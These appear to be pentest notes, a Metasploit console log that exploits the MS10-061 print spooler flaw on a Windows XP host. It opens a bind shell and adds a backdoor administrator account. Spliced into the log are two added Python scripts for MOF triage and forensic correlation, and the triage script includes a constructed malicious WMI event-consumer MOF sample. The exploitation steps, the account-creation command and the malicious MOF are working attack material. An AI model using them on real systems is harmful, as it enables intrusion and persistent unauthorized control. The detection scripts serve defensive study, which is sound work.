Pentest Notes - 2013-07-13 ms10_061_spoolss

Time: 2022-01-03 06:02:52
[*] Please wait while the Metasploit Pro Console initializes... 
[*] Starting Metasploit Console... 
=[ metasploit v4.4.0-dev [core:4.4 api:1.0] 
+ -- --=[ 840 exploits - 495 auxiliary - 146 post 
+ -- --=[ 250 payloads - 27 encoders - 8 nops 
[*] Successfully loaded plugin: pro 
msf > search ms10_061 
Matching Modules
================
   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/windows/smb/ms10_061_spoolss  2010-09-14       excellent  Microsoft Print Spooler Service Impersonation Vulnerability
msf > use exploit/windows/smb/ms10_061_spoolss 
msf exploit(ms10_061_spoolss) > info 
Name: Microsoft Print Spooler Service Impersonation Vulnerability 
Module: exploit/windows/smb/ms10_061_spoolss 
Version: 14976 
Platform: Windows 
Privileged: Yes 
License: Metasploit Framework License (BSD) 
Rank: Excellent 
Provided by: 
jduck <jduck@metasploit.com> 
hdm <hdm@metasploit.com> 
Available targets:
  Id  Name
  --  ----
  0   Windows Universal
Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PNAME                     no        The printer share name to use on the target
  RHOST                     yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  spoolss          no        The named pipe for the spooler service
Payload information: 
Space: 1024 
Avoid: 0 characters 
Description: 
This module exploits the RPC service impersonation vulnerability 
detailed in Microsoft Bulletin MS10-061. By making a specific DCE 
RPC request to the StartDocPrinter procedure, an attacker can 
impersonate the Printer Spooler service to create a file. The 
working directory at the time is %SystemRoot%\system32. An attacker 
can specify any file name, including directory traversal or full 
paths. By sending WritePrinter requests, an attacker can fully 
control the content of the created file. In order to gain code 
execution, this module writes to a directory used by Windows 
Management Instrumentation (WMI) to deploy applications. This 
directory (Wbem\Mof) is periodically scanned and any new .mof files 
are processed automatically. This is the same technique employed by 
the Stuxnet code found in the wild. 
References: 
http://www.osvdb.org/67988 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729 
http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx 
msf exploit(ms10_061_spoolss) > set RHOST 142.168.2.20 
RHOST => 142.168.2.20 
msf exploit(ms10_061_spoolss) > set PAYLOAD windows/shell/bind_tcp 
PAYLOAD => windows/shell/bind_tcp 
msf exploit(ms10_061_spoolss) > info 
Name: Microsoft Print Spooler Service Impersonation Vulnerability 
Module: exploit/windows/smb/ms10_061_spoolss 
Version: 14976 
Platform: Windows 
Privileged: Yes 
License: Metasploit Framework License (BSD) 
Rank: Excellent 
Provided by: 
jduck <jduck@metasploit.com> 
hdm <hdm@metasploit.com> 
Available targets:
  Id  Name
  --  ----
  0   Windows Universal
Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PNAME                     no        The printer share name to use on the target
  RHOST    142.168.2.20     yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  spoolss          no        The named pipe for the spooler service
Payload information: 
Space: 1024 
Avoid: 0 characters 
Description: 
This module exploits the RPC service impersonation vulnerability 
detailed in Microsoft Bulletin MS10-061. By making a specific DCE 
RPC request to the StartDocPrinter procedure, an attacker can 
impersonate the Printer Spooler service to create a file. The 
working directory at the time is %SystemRoot%\system32. An attacker 
can specify any file name, including directory traversal or full 
paths. By sending WritePrinter requests, an attacker can fully 
control the content of the created file. In order to gain code 
execution, this module writes to a directory used by Windows 
Management Instrumentation (WMI) to deploy applications. This 
directory (Wbem\Mof) is periodically scanned and any new .mof files 
are processed automatically. This is the same technique employed by 
the Stuxnet code found in the wild. 
References: 
http://www.osvdb.org/67988 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729 
http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx 
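The description above explains the execution step: the module corrupts no memory, it drops a .mof file that WMI compiles on its own, and that file registers an event consumer which launches the dropped executable. The Python triage script below is added here as an example; it is not part of the original post or of the Metasploit module. It walks the `instance of` blocks of a MOF file and reports whether the file registers an ActiveScriptEventConsumer or CommandLineEventConsumer, an __EventFilter and a __FilterToConsumerBinding, which files the consumer would run, and whether the file fires its own filter by creating an instance of the class the WQL query watches. The function names are mine, and both MOF samples are constructed for the example: the malicious one follows the event-consumer layout of the technique and reuses the executable name from the exploit log, but it is not the module's real template.

```python
import re

# WMI consumer classes that turn an event into code execution. A MOF that
# registers one of these together with an __EventFilter and a
# __FilterToConsumerBinding is an autorun/persistence registration.
EXEC_CONSUMERS = {"activescripteventconsumer", "commandlineeventconsumer"}
# Consumer properties that carry what gets executed.
PAYLOAD_PROPS = ("ScriptText", "ScriptFileName", "CommandLineTemplate", "ExecutablePath")

INSTANCE_HEAD_RE = re.compile(r"instance\s+of\s+(\w+)(?:\s+as\s+\$(\w+))?\s*\{", re.IGNORECASE)
# prop = "string with \" and \\ escapes";   or   prop = $ref / 123 / {array};
PROP_RE = re.compile(r'(\w+)\s*=\s*(?:"((?:\\.|[^"\\])*)"|([^;]+));', re.DOTALL)
# File names an executed script or command line would launch.
EXE_RE = re.compile(r"[^\s\"'(),;]+\.(?:exe|dll|bat|cmd|vbs|js|scr)\b", re.IGNORECASE)
_ESC = {"n": "\n", "t": "\t", "r": "\r"}


def _unescape(s):
    """Turn MOF string escapes back into literal text."""
    return re.sub(r"\\(.)", lambda m: _ESC.get(m.group(1), m.group(1)), s, flags=re.DOTALL)


def _body(text, open_idx):
    """Return (body, index after the matching '}') for the block opening at
    text[open_idx]. String literals are skipped, since a JScript body such as
    'catch (e) {};' legally contains braces and semicolons."""
    depth, in_str, i = 0, False, open_idx
    while i < len(text):
        c = text[i]
        if in_str:
            if c == "\\":
                i += 1                      # skip the escaped character
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
        elif c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
            if depth == 0:
                return text[open_idx + 1:i], i + 1
        i += 1
    raise ValueError("unbalanced braces in MOF")


def parse_instances(text):
    """Yield (class_name, alias, {property: value}) for every 'instance of' block."""
    pos = 0
    while True:
        m = INSTANCE_HEAD_RE.search(text, pos)
        if not m:
            return
        body, pos = _body(text, m.end() - 1)
        props = {}
        for p in PROP_RE.finditer(body):
            props[p.group(1)] = _unescape(p.group(2)) if p.group(2) is not None else p.group(3).strip()
        yield m.group(1), m.group(2), props


def analyze_mof(text):
    """Triage one MOF file: which execution consumers, filters and bindings it
    registers, what the consumers would run, and whether it fires itself."""
    consumers, filters, created, bindings = [], [], set(), 0
    for cls, _alias, props in parse_instances(text):
        key = cls.lower()
        created.add(key)
        if key in EXEC_CONSUMERS:
            hits = [h for prop in PAYLOAD_PROPS for h in EXE_RE.findall(props.get(prop, ""))]
            consumers.append({"class": cls, "name": props.get("Name"),
                              "executes": sorted({re.sub(r"\\+", r"\\", h) for h in hits})})
        elif key == "__eventfilter":
            filters.append({"name": props.get("Name"), "query": props.get("Query", "")})
        elif key == "__filtertoconsumerbinding":
            bindings += 1
    # The MS10-061/Stuxnet-style MOF needs no outside event: it creates an instance of
    # the very class its WQL filter watches, so compiling the file is enough to fire it.
    self_triggering = False
    for f in filters:
        m = re.search(r"\bISA\s+\"?(\w+)\"?", f["query"], re.IGNORECASE)
        if m and m.group(1).lower() in created:
            self_triggering = True
    return {"consumers": consumers, "filters": filters, "bindings": bindings,
            "autorun": bool(consumers and filters and bindings),
            "self_triggering": self_triggering}


# Constructed samples (not the module's real template). The malicious one follows the
# event-consumer layout described in the module text and names the executable from the log.
MALICIOUS_MOF = r'''
#pragma namespace("\\\\.\\root\\cimv2")
class MyDrop { [key] string Name; };
instance of ActiveScriptEventConsumer as $Cons {
    Name = "ASEC";
    ScriptingEngine = "JScript";
    ScriptText = "\ntry {var WSH = new ActiveXObject(\"WScript.Shell\");\nWSH.Run(\"C:\\\\WINDOWS\\\\system32\\\\9o43IDgKLE0SjU.exe\");} catch (e) {};\n";
};
instance of __EventFilter as $Filt {
    Name = "EF";
    EventNamespace = "root\\cimv2";
    Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance ISA \"MyDrop\"";
    QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding { Consumer = $Cons; Filter = $Filt; };
instance of MyDrop { Name = "trigger"; };
'''
BENIGN_MOF = r'''
#pragma namespace("\\\\.\\root\\cimv2")
class Acme_Widget { [key] string Name; uint32 Size; };
instance of Acme_Widget { Name = "left"; Size = 3; };
'''

if __name__ == "__main__":
    for label, mof in (("malicious", MALICIOUS_MOF), ("benign", BENIGN_MOF)):
        print(label, analyze_mof(mof))
```

Run it over every .mof under %SystemRoot%\system32\wbem\mof, including the good\ and bad\ subfolders, because on XP/2003 WMI keeps the compiled file there as evidence. The brace walker skips string literals, so a JScript body containing `{};` does not cut an instance short; MOF comments are not handled, which is acceptable for triage.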
msf exploit(ms10_061_spoolss) > exploit 
[*] Started bind handler 
[*] Trying target Windows Universal... 
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ... 
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ... 
[*] Attempting to exploit MS10-061 via \\142.168.2.20\SmartPrinter ... 
[*] Printer handle: 00000000950606c7fee7b348bc5b841597479b61 
[*] Job started: 0x4 
[*] Wrote 73802 bytes to %SystemRoot%\system32\9o43IDgKLE0SjU.exe 
[*] Job started: 0x5 
[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\vWMbWpPJt8K6aD.mof 
[*] Everything should be set, waiting for a session... 
[*] Sending stage (240 bytes) to 142.168.2.20 
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
IUSR_INTRA-PC            IWAM_INTRA-PC            shentouceshiwy
SUPPORT_388945a0
The command completed with one or more errors.
C:\WINDOWS\system32>net user hacker 123 /add & net localgroup administrators hacker /add
net user hacker 123 /add & net localgroup administrators hacker /add
The command completed successfully.
The command completed successfully.
C:\WINDOWS\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator            Guest                    hacker
HelpAssistant            IUSR_INTRA-PC            IWAM_INTRA-PC
shentouceshiwy           SUPPORT_388945a0
The command completed with one or more errors.
C:\WINDOWS\system32>
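The exploit log above shows the two writes that matter for forensics: an executable into %SystemRoot%\system32 (the spooler's working directory) and then a .mof into wbem\mof. The Python example below is added here and is not part of the original post; it correlates a file-creation listing along those lines. Every .mof found in wbem\mof or in its good\ and bad\ subfolders (where the XP/2003 WMI service moves files after compiling them) becomes a finding, paired with any executable created directly in system32 within a short window before it; a .mof with no partner is still reported, since the description says the attacker may also write to a full path elsewhere. The function name is mine, a fixed C:\WINDOWS system root is assumed, and the listing is constructed for the example using the file names from the log.

```python
import ntpath
from datetime import datetime, timedelta

# MS10-061 writes relative to the spooler's working directory, %SystemRoot%\system32,
# and drops its trigger into wbem\mof. On XP/2003 the WMI service compiles whatever
# appears there and then moves the file into the good\ or bad\ subfolder, so all
# three folders are evidence locations. A fixed C:\WINDOWS root is assumed here.
SYS32 = r"c:\windows\system32"
MOF_DIRS = {SYS32 + r"\wbem\mof": "pending",
            SYS32 + r"\wbem\mof\good": "compiled",
            SYS32 + r"\wbem\mof\bad": "rejected"}
DROP_EXT = (".exe", ".dll", ".scr")


def find_mof_drops(listing, window=timedelta(minutes=5)):
    """listing: iterable of (path, created_datetime), e.g. from a forensic image.
    Returns one finding per .mof in a WMI drop folder, with the executables created
    directly in system32 (not a subfolder) up to `window` before it, closest first."""
    mofs, exes = [], []
    for path, created in listing:
        folder, name = ntpath.split(path.lower())      # ntpath handles backslashes on any OS
        if folder in MOF_DIRS and name.endswith(".mof"):
            mofs.append((path, created, MOF_DIRS[folder]))
        elif folder == SYS32 and name.endswith(DROP_EXT):
            exes.append((path, created))
    findings = []
    for mof, t, state in sorted(mofs, key=lambda m: m[1]):
        pairs = [(exe, (t - te).total_seconds()) for exe, te in exes
                 if timedelta(0) <= t - te <= window]
        findings.append({"mof": mof, "state": state, "created": t,
                         "paired_exe": sorted(pairs, key=lambda p: p[1])})
    return findings


# Constructed listing: the two names from the exploit log, a stock binary, and a
# later MOF with no executable near it in time.
SAMPLE_LISTING = [
    (r"C:\WINDOWS\system32\calc.exe", datetime(2008, 4, 14, 12, 0, 0)),
    (r"C:\WINDOWS\system32\9o43IDgKLE0SjU.exe", datetime(2013, 7, 13, 10, 21, 3)),
    (r"C:\WINDOWS\system32\wbem\mof\good\vWMbWpPJt8K6aD.mof", datetime(2013, 7, 13, 10, 21, 5)),
    (r"C:\WINDOWS\system32\wbem\mof\good\vendor_agent.mof", datetime(2013, 7, 13, 11, 45, 0)),
]

if __name__ == "__main__":
    for finding in find_mof_drops(SAMPLE_LISTING):
        print(finding)
```

Treat a paired finding as a lead, not a verdict: product installers also drop MOF files, so confirm by reading the .mof itself and by checking the partner executable's hash and signature. The automatic compile of wbem\mof is XP/2003 behaviour; on later Windows the same folder is not processed, which is why this module targets "Windows Universal" in practice only against those releases.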